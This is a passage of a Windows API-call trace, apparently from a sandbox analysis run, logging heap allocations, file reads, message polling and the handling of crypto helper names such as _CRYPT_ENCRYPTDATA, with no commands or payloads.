wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0086.539] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0086.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0086.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0086.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0086.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0086.542] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0086.542] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0xc7e0, lpOverlapped=0x0) returned 1 [0086.544] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0086.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0086.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0086.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc7e0) returned 0x4516010 [0086.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc7e0) returned 0x45227f8 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.547] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0086.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0086.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0086.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc7e0) returned 0x4516010 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0086.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.547] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0086.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0086.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0086.548] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0086.548] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0086.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0086.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc7e0) returned 0x4516010 [0086.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0086.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0086.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0086.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0086.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca280 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc7e0) returned 0x452efe0 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0086.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0086.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0086.550] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0086.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0086.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0086.550] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0086.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.550] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0086.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0086.551] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0086.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0086.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0086.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca388 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0086.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0086.551] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0086.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0086.551] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.552] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0086.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0086.552] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0086.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.553] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0086.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0086.553] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0086.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0086.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0086.553] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0086.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0086.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0086.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0086.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0086.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0086.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0086.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0086.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0086.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0086.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0086.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0086.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0086.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0086.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0086.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0086.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0086.555] 